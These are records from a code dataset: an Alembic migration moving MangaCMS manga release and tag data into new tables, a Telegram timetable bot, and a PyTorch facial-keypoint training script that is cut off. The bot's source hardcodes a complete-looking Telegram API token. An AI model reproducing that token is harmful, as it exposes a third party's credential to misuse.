"matplotlib.pyplot.close", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.waitforbuttonpress", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "12652160041", "text": "\"\"\"Migrate Hentai Data\n\nRevision ID: 0ab876947815\nRevises: fd657f7977c2\nCreate Date: 2018-02-23 22:30:17.727678\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0ab876947815'\ndown_revision = '1d6c79218b3e'\nbranch_labels = None\ndepends_on = None\n\nimport traceback\nimport sys\nimport threading\nimport concurrent.futures\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nimport sqlalchemy_utils\nimport sqlalchemy_jsonfield\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nimport citext\nimport queue\nimport datetime\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\nischema_names['citext'] = citext.CIText\n\n\nimport datetime\nimport cachetools\nimport tqdm\nimport json\nimport hashlib\nimport os.path\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nimport citext\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\nischema_names['citext'] = citext.CIText\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import backref\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import Table\nfrom sqlalchemy import Index\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import Integer\nfrom sqlalchemy import BigInteger\nfrom sqlalchemy import Text\nfrom sqlalchemy import Float\nfrom sqlalchemy import Boolean\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import PrimaryKeyConstraint\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.schema import UniqueConstraint\nimport sqlalchemy_jsonfield\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.associationproxy import association_proxy\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.ext.declarative import declarative_base\n\ndlstate_enum = ENUM('new', 'fetching', 'processing', 'complete', 'error', 'removed', 'disabled', 'upload', 'missing', name='dlstate_enum')\ndir_type = ENUM('had_dir', 'created_dir', 'unknown', name='dirtype_enum')\nfile_type = ENUM('manga', 'hentai', 'unknown', name='filetype_enum')\n\n\ndef upgrade():\n\t# ### commands auto generated by Alembic - please #\n\n\timport MangaCMSOld.lib.dbPool\n\n\tif \"testing\" in sys.argv:\n\t\treturn\n\n\tdef go(mode):\n\t\tbind = op.get_bind()\n\t\tsess = Session(bind=bind)\n\n\t\t# Cache 500K items, with a 30 minute ttl\n\t\ttag_cache_size = 500 * 1000\n\t\ttag_cache_ttl = 60 * 30\n\n\t\t########################################################################################\n\n\t\tBase = declarative_base()\n\n\t\t########################################################################################\n\n\t\tmanga_files_tags_link = Table(\n\t\t\t\t'manga_files_tags_link', Base.metadata,\n\t\t\t\tColumn('releases_id', Integer, ForeignKey('release_files.id'), nullable=False),\n\t\t\t\tColumn('tags_id', Integer, ForeignKey('manga_tags.id'), nullable=False),\n\t\t\t\tPrimaryKeyConstraint('releases_id', 'tags_id')\n\t\t\t)\n\t\tmanga_releases_tags_link = Table(\n\t\t\t\t'manga_releases_tags_link', Base.metadata,\n\t\t\t\tColumn('releases_id', Integer, ForeignKey('manga_releases.id'), nullable=False),\n\t\t\t\tColumn('tags_id', Integer, ForeignKey('manga_tags.id'), nullable=False),\n\t\t\t\tPrimaryKeyConstraint('releases_id', 'tags_id')\n\t\t\t)\n\n\t\tclass MangaTags(Base):\n\t\t\t__tablename__ = 'manga_tags'\n\t\t\tid = Column(Integer, primary_key=True)\n\t\t\ttag = Column(citext.CIText(), nullable=False, index=True)\n\n\t\t\t__table_args__ = (\n\t\t\t\t\tUniqueConstraint('tag'),\n\t\t\t\t)\n\n\t\t\t@classmethod\n\t\t\t@cachetools.cached(cache=cachetools.TTLCache(tag_cache_size, tag_cache_ttl))\n\t\t\tdef get_or_create(cls, tag):\n\t\t\t\ttmp = sess.query(cls) \\\n\t\t\t\t\t.filter(cls.tag == tag) \\\n\t\t\t\t\t.scalar()\n\t\t\t\tif tmp:\n\t\t\t\t\tsess.expunge(tmp)\n\t\t\t\t\treturn tmp\n\n\t\t\t\t# print(\"manga_tag_creator\", tag)\n\t\t\t\ttmp = cls(tag=tag)\n\t\t\t\tsess.add(tmp)\n\t\t\t\tsess.commit()\n\t\t\t\tsess.expunge(tmp)\n\t\t\t\treturn tmp\n\n\n\t\t########################################################################################\n\n\t\tclass MangaReleases(Base):\n\t\t\t__tablename__ = 'manga_releases'\n\t\t\tid = Column(BigInteger, primary_key=True)\n\t\t\tstate = Column(dlstate_enum, nullable=False, index=True, default='new')\n\t\t\terr_str = Column(Text)\n\n\t\t\tsource_site = Column(Text, nullable=False, index=True) # Actual source site\n\t\t\tsource_id = Column(Text, nullable=False, index=True) # ID On source site. Usually (but not always) the item URL\n\n\t\t\tfirst_seen = Column(DateTime, nullable=False)\n\t\t\tposted_at = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\t\t\tdownloaded_at = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\t\t\tlast_checked = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\n\t\t\tdeleted = Column(Boolean, default=False, nullable=False)\n\t\t\twas_duplicate = Column(Boolean, default=False, nullable=False)\n\t\t\tphash_duplicate = Column(Boolean, default=False, nullable=False)\n\t\t\tuploaded = Column(Boolean, default=False, nullable=False)\n\n\t\t\tdirstate = Column(dir_type, nullable=False, default=\"unknown\")\n\n\t\t\torigin_name = Column(Text)\n\t\t\tseries_name = Column(Text, index=True)\n\n\t\t\tadditional_metadata = Column(sqlalchemy_jsonfield.JSONField())\n\n\t\t\tfileid = Column(BigInteger, ForeignKey('release_files.id'))\n\t\t\tfile = relationship('ReleaseFile', backref='manga_releases')\n\n\t\t\ttags_rel = relationship('MangaTags',\n\t\t\t\t\t\t\t\t\t\t\t\tsecondary = manga_releases_tags_link,\n\t\t\t\t\t\t\t\t\t\t\t\tbackref = backref(\"manga_releases\", lazy='dynamic'),\n\t\t\t\t\t\t\t\t\t\t\t\tcollection_class = set)\n\t\t\ttags = association_proxy('tags_rel', 'tag', creator=MangaTags.get_or_create)\n\n\t\t\t__table_args__ = (\n\t\t\t\t\tUniqueConstraint('source_site', 'source_id'),\n\t\t\t\t\tIndex('manga_releases_source_site_id_idx', 'source_site', 'source_id')\n\t\t\t\t)\n\n\n\n\n\t\tclass ReleaseFile(Base):\n\t\t\t__tablename__ = 'release_files'\n\t\t\tid = Column(BigInteger, primary_key=True)\n\n\t\t\tdirpath = Column(Text, nullable=False)\n\t\t\tfilename = Column(Text, nullable=False)\n\t\t\tfhash = Column(Text, nullable=False)\n\t\t\tfile_type = Column(file_type, nullable=False, default=\"unknown\")\n\n\t\t\twas_duplicate = Column(Boolean, default=False, nullable=False)\n\n\t\t\tlast_dup_check = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\n\t\t\tmanga_tags_rel = relationship('MangaTags',\n\t\t\t\t\t\t\t\t\t\t\t\tsecondary=manga_files_tags_link,\n\t\t\t\t\t\t\t\t\t\t\t\tbackref=backref(\"release_files\", lazy='dynamic'),\n\t\t\t\t\t\t\t\t\t\t\t\tcollection_class=set)\n\t\t\tmanga_tags = association_proxy('manga_tags_rel', 'tag', creator=MangaTags.get_or_create)\n\n\t\t\t# releases = relationship('MangaReleases')\n\n\t\t\t__table_args__ = (\n\t\t\t\tUniqueConstraint('dirpath', 'filename'),\n\t\t\t\tUniqueConstraint('fhash'),\n\t\t\t\t)\n\n\n\t\tdef get_add_file(sess, fname, fpath):\n\t\t\tif fpath is None or fname is None:\n\t\t\t\treturn None\n\t\t\tfqname = os.path.join(fpath, fname)\n\t\t\tif not os.path.exists(fqname):\n\t\t\t\treturn None\n\t\t\tif os.path.isdir(fqname):\n\t\t\t\treturn None\n\n\t\t\thave = sess.query(ReleaseFile) \\\n\t\t\t\t.filter(ReleaseFile.dirpath == fpath) \\\n\t\t\t\t.filter(ReleaseFile.filename == fname) \\\n\t\t\t\t.scalar()\n\n\t\t\tif have:\n\t\t\t\treturn have\n\n\n\t\t\t# print(\"Hashing file...\", end=\"\", flush=True)\n\t\t\thash_md5 = hashlib.md5()\n\t\t\twith open(fqname, \"rb\") as f:\n\t\t\t\thash_md5.update(f.read())\n\t\t\tfhash = hash_md5.hexdigest()\n\t\t\t# print(\"done.\")\n\n\n\t\t\thave = sess.query(ReleaseFile) \\\n\t\t\t\t.filter(ReleaseFile.fhash == fhash) \\\n\t\t\t\t.scalar()\n\n\t\t\tif have:\n\t\t\t\t# print(\"Have by fhash\")\n\t\t\t\treturn have\n\n\t\t\tnew = ReleaseFile(\n\t\t\t\tdirpath = fpath,\n\t\t\t\tfilename = fname,\n\t\t\t\tfhash = fhash\n\t\t\t\t)\n\t\t\tsess.add(new)\n\t\t\treturn new\n\n\n\t\tdef migrate_manga_tags(row, flags, tags):\n\t\t\t# print(\"Tags:\", tags)\n\t\t\ttags = tags.split(\" \")\n\t\t\ttags = [tmp for tmp in tags if not tmp.startswith(\"crosslink-\")]\n\n\t\t\ttags = [tmp.replace(\"-(female)\", \"-female\").replace(\"-(male)\", \"-male\") for tmp in tags]\n\t\t\ttags = [tmp for tmp in tags if len(tmp) >= 2]\n\n\t\t\ttags = set(tags)\n\t\t\ttags = tags - set([\"phash-duplicate\", \"was-duplicate\", \"uploaded\", 'dup-checked', 'deleted'])\n\n\t\t\tif not tags:\n\t\t\t\treturn\n\n\t\t\tif row.file:\n\t\t\t\trow.file.manga_tags.update(tags)\n\t\t\trow.tags.update(tags)\n\n\t\tdef dlstate_decode(state_int):\n\n\t\t\tstate_val = \"new\"\n\t\t\tif state_int == 1:\n\t\t\t\tstate_val = 'fetching'\n\t\t\telif state_int == 2:\n\t\t\t\tstate_val = 'complete'\n\t\t\telif state_int == 3:\n\t\t\t\tstate_val = 'upload'\n\t\t\telif state_int > 3:\n\t\t\t\tstate_val = 'disabled'\n\t\t\telif state_int < 0:\n\t\t\t\tstate_val = 'error'\n\t\t\treturn state_val\n\n\t\tdef dirstate_decode(flags):\n\n\t\t\tdirstate_val = \"unknown\"\n\t\t\tif \"haddir\" in flags:\n\t\t\t\tdirstate_val = \"had_dir\"\n\t\t\telif \"new_dir\" in flags:\n\t\t\t\tdirstate_val = \"new_dir\"\n\t\t\treturn dirstate_val\n\n\t\tdef go_manga():\n\n\t\t\told_con = MangaCMSOld.lib.dbPool.pool.getconn()\n\t\t\told_cur = old_con.cursor()\n\n\t\t\t# print(\"Connection:\", old_con)\n\t\t\t# print(\"Cursor:\", old_cur)\n\t\t\t# print(\"Session:\", sess)\n\t\t\told_cur.execute(\"SELECT sourcesite, dlstate, sourceurl, retreivaltime, lastupdate, sourceid, seriesname, filename, originname, downloadpath, flags, tags, note FROM mangaitems ORDER BY dbid DESC\")\n\n\t\t\tfetchchunk = 1000\n\t\t\titems = []\n\n\t\t\tprint(\"Loading %s rows from DB\" % mode)\n\t\t\titems = old_cur.fetchall()\n\t\t\tprint(\"Loaded %s %s rows\" % (len(items), mode))\n\n\t\t\tprint(\"Barrier released!\")\n\t\t\tnew = 0\n\t\t\tfor item in tqdm.tqdm(items, desc=\"Processing %s\" % mode, position=1 if mode == \"hentai\" else 0):\n\t\t\t\tsourcesite, dlstate, sourceurl, retreivaltime, lastupdate, sourceid, seriesname, filename, originname, downloadpath, flags, tags, note = item\n\n\t\t\t\ttags = tags if tags else \"\"\n\t\t\t\tflags = flags if flags else \"\"\n\n\t\t\t\thave = sess.query(MangaReleases) \\\n\t\t\t\t\t.filter(MangaReleases.source_id == sourceurl) \\\n\t\t\t\t\t.options(joinedload(\"file\"), joinedload(\"file.manga_tags_rel\"), joinedload(\"tags_rel\"), ) \\\n\t\t\t\t\t.scalar()\n\n\t\t\t\tif have:\n\t\t\t\t\tmigrate_manga_tags(have, flags, tags)\n\t\t\t\t\t# print(\"Skipping!\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tfile = get_add_file(sess, filename, downloadpath)\n\t\t\t\tsess.flush()\n\n\t\t\t\t# print(\"'{}', '{}'\".format(flags, tags))\n\t\t\t\ttags = tags if tags else \"\"\n\t\t\t\tflags = flags if flags else \"\"\n\n\t\t\t\tstate_val = dlstate_decode(dlstate)\n\t\t\t\tdirstate_val = dirstate_decode(flags)\n\n\n\t\t\t\tadditional_metadata = {}\n\t\t\t\tif file is None:\n\t\t\t\t\tstate_val = 'missing'\n\t\t\t\t\tadditional_metadata = {\n\t\t\t\t\t\t'filename' : filename,\n\t\t\t\t\t\t'downloadpath' : downloadpath,\n\t\t\t\t\t}\n\n\n\n\t\t\t\tif sourceid:\n\t\t\t\t\tloaded_meta = json.loads(sourceid)\n\n\t\t\t\t\tadditional_metadata['sourceid'] = loaded_meta\n\t\t\t\tif note:\n\t\t\t\t\tadditional_metadata['note'] = note\n\t\t\t\t\t# print(\"Note:\", note)\n\n\t\t\t\tdl_at = datetime.datetime.utcfromtimestamp(lastupdate)\n\t\t\t\tposted_at = datetime.datetime.utcfromtimestamp(retreivaltime)\n\n\t\t\t\trow = MangaReleases(\n\t\t\t\t\t\tstate = state_val,\n\t\t\t\t\t\terr_str = None,\n\t\t\t\t\t\tsource_site = sourcesite,\n\t\t\t\t\t\tseries_name = seriesname,\n\t\t\t\t\t\tsource_id = sourceurl,\n\t\t\t\t\t\tfirst_seen = dl_at if dl_at > posted_at else posted_at,\n\t\t\t\t\t\tposted_at = dl_at,\n\t\t\t\t\t\tdownloaded_at = posted_at,\n\t\t\t\t\t\tphash_duplicate = \"phash-duplicate\" in tags,\n\t\t\t\t\t\twas_duplicate = \"was-duplicate\" in tags,\n\t\t\t\t\t\tuploaded = \"uploaded\" in tags,\n\t\t\t\t\t\tdeleted = \"deleted\" in tags,\n\t\t\t\t\t\tdirstate = dirstate_val,\n\t\t\t\t\t\torigin_name = originname,\n\t\t\t\t\t\tadditional_metadata = additional_metadata,\n\t\t\t\t\t\tfileid = file.id if file else None,\n\t\t\t\t\t)\n\t\t\t\tsess.add(row)\n\t\t\t\tmigrate_manga_tags(row, flags, tags)\n\n\t\t\t\tnew += 1\n\t\t\t\tif new > 1000:\n\t\t\t\t\tnew = 0\n\t\t\t\t\tprint(\"\\nCommitting %s!\\n\" % mode)\n\n\t\t\t\t\tsess.flush()\n\t\t\t\t\tsess.commit()\n\t\t\t\t\tbind.execute(\"\"\"COMMIT\"\"\")\n\n\t\ttry:\n\t\t\tgo_manga()\n\t\t\tprint(\"Migration of %s complete!\" % mode)\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tprint(\"Thread had exception\")\n\t\t\ttraceback.print_exc()\n\t\t\treturn False\n\t\t\traise e\n\n\twith concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n\t\tres = []\n\t\tres.append(executor.submit(go, 'manga'))\n\n\t\tif not all([tmp.result() for tmp in res]):\n\n\t\t\traise RuntimeError(\"Failure in migration!\")\n\n\t# ### end Alembic commands ###\n\ndef downgrade():\n\t# ### commands auto generated by Alembic - please adjust! ###\n\tpass\n\t# ### end Alembic commands ###\n", "repo_name": "herp-a-derp/MangaCMS", "sub_path": "alembic/versions/92b545554cb2_.py", "file_name": "92b545554cb2_.py", "file_ext": "py", "file_size_in_byte": 12857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlalchemy.dialects.postgresql.base.ischema_names", "line_number": 34, "usage_type": "name"}, {"api_name": "citext.CIText", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sqlalchemy.dialects.postgresql.base.ischema_names", "line_number": 55, "usage_type": "name"}, {"api_name": "citext.CIText", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 86, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 87, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 88, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "attribute"}, {"api_name": "alembic.op.get_bind", "line_number": 100, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.session.Session", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 113, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 115, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 115, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 116, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 116, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 116, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 117, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 119, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 121, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 121, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 121, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 122, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 122, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 122, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 123, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 128, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 128, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 129, "usage_type": "call"}, {"api_name": "citext.CIText", "line_number": 129, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 132, "usage_type": "call"}, {"api_name": "cachetools.cached", "line_number": 136, "usage_type": "call"}, {"api_name": "cachetools.TTLCache", "line_number": 136, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 157, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 157, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 158, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 159, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 159, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 161, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 161, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 162, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 162, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 164, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 164, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 165, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 165, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 165, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 166, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 166, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 166, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 167, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 167, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlalchemy.Column", "line_number": 169, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 169, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 170, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 170, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 171, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 171, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 172, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 172, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 174, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 176, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 176, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 177, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 177, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 179, "usage_type": "call"}, {"api_name": "sqlalchemy_jsonfield.JSONField", "line_number": 179, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 181, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 184, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.backref", "line_number": 186, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 188, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 191, "usage_type": "call"}, {"api_name": "sqlalchemy.Index", "line_number": 192, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 200, "usage_type": "call"}, {"api_name": "sqlalchemy.BigInteger", "line_number": 200, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 202, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 202, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 203, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 203, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 204, "usage_type": "call"}, {"api_name": "sqlalchemy.Text", "line_number": 204, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 205, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 207, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 207, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 209, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 209, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 211, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.backref", "line_number": 213, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 215, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 220, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.UniqueConstraint", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 228, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.path.isdir", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 231, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 244, "usage_type": "call"}, {"api_name": "MangaCMSOld.lib.dbPool.lib.dbPool.pool.getconn", "line_number": 312, "usage_type": "call"}, {"api_name": "MangaCMSOld.lib.dbPool.lib", "line_number": 312, "usage_type": "attribute"}, {"api_name": "MangaCMSOld.lib.dbPool", "line_number": 312, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 329, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.joinedload", "line_number": 337, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 367, "usage_type": "call"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 374, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 374, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 375, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 375, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 413, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 417, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 417, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 417, "usage_type": "name"}]}
+{"seq_id": "37403729837", "text": "import telebot\n\nAPI_TOKEN = '2144331292:AAG2F3nOufD70TVURRzHuTrJ3fNytutb6eI'\nbot = telebot.TeleBot(API_TOKEN)\n\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n if message.text == '/start':\n bot.reply_to(message, \"\"\"\\\n Hi there, I am TimeBot.\n \nCodebuild Here!\n\nI am here to help you don't forgot your timetable of classes!\\\n \"\"\")\n else:\n bot.reply_to(message, \"\"\"\\\n Hi there, I am TimeBot.\nI know the schedule for 5 days (Monday, Tuesday, Wednesday, Thursday, Friday)!\n \"\"\")\n \n\n\nfile = open(\"text.txt\" , 'r')\ntemp = file.read()\ntimetable = temp.split(\"\\n\\n\")\n\n@bot.message_handler(content_types=['text'])\ndef send_text(message):\n if message.text.lower() == 'monday':\n bot.send_message(message.chat.id, timetable[0])\n if message.text.lower() == 'tuesday':\n bot.send_message(message.chat.id, timetable[1])\n if message.text.lower() == 'wednesday':\n bot.send_message(message.chat.id, timetable[2])\n if message.text.lower() == 'thursday':\n bot.send_message(message.chat.id, timetable[3])\n if message.text.lower() == 'friday':\n bot.send_message(message.chat.id, timetable[4])\n\nbot.infinity_polling()", "repo_name": "ignat24/Final-Demo", "sub_path": "app/bot/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "telebot.TeleBot", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "16719356728", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 22 19:21:08 2021\n\n@author: mateusz\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom torchvision import transforms\n\n\nfrom torch.utils.data import DataLoader\n\nfrom dataloader.FacialDetection import FacialDetectionDataset, my_collate\nfrom networks.fcn import FCN2D, Pooled_FCN2D\nfrom utils.image_processing import convert_tensor_to_im\n\n#%% Find GPU\ncuda = True if torch.cuda.is_available() else False\ndevice = torch.device('cuda') if cuda else torch.device('cpu')\n\n#%% Hyperparameters\nBATCH_SIZE_TRAIN = 32\nBATCH_SIZE_VAL = 5\nEPOCHS = 100\nCALLBACK_FREQ = 5\n\n#%% Dataloader\n\ntransform_func = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])])\n\ndata = FacialDetectionDataset('data/training.csv',\n transform=transform_func,\n target_transform=transform_func)\n\ntrain_data, val_data = torch.utils.data.random_split(data, \n [len(data)-20, 20])\n\ntrain_loader = DataLoader(dataset=train_data, \n batch_size=BATCH_SIZE_TRAIN, \n shuffle=True, \n num_workers=0)\n\nval_loader = DataLoader(dataset=val_data, \n batch_size=BATCH_SIZE_VAL, \n shuffle=True, \n num_workers=0)\n\n#%% Preparation for training\nnet = Pooled_FCN2D().to(device)\n\ncriterion = nn.MSELoss().to(device)\noptim = torch.optim.Adam(net.parameters(), lr=0.0002, \n betas=(0.5, 0.999))\nlosses_train = []\nlosses_val = []\n\nfor epoch in range(EPOCHS):\n net.train()\n for ii, (im, label) in enumerate(train_loader):\n optim.zero_grad()\n output = net(im.to(device))\n loss_train = criterion(output, label.to(device))\n loss_train.backward()\n optim.step()\n\n if epoch % CALLBACK_FREQ == 0:\n net.eval()\n val_im, val_label = next(iter(val_loader)) \n output = net(val_im.to(device))\n \n loss_val = criterion(output, val_label.to(device))\n losses_val.append(loss_val.item())\n\n plt.figure(figsize=(5, 5))\n readable_output = np.sum(output[0].detach().cpu().numpy(),axis=0,\n keepdims=True)\n fig, (ax1, 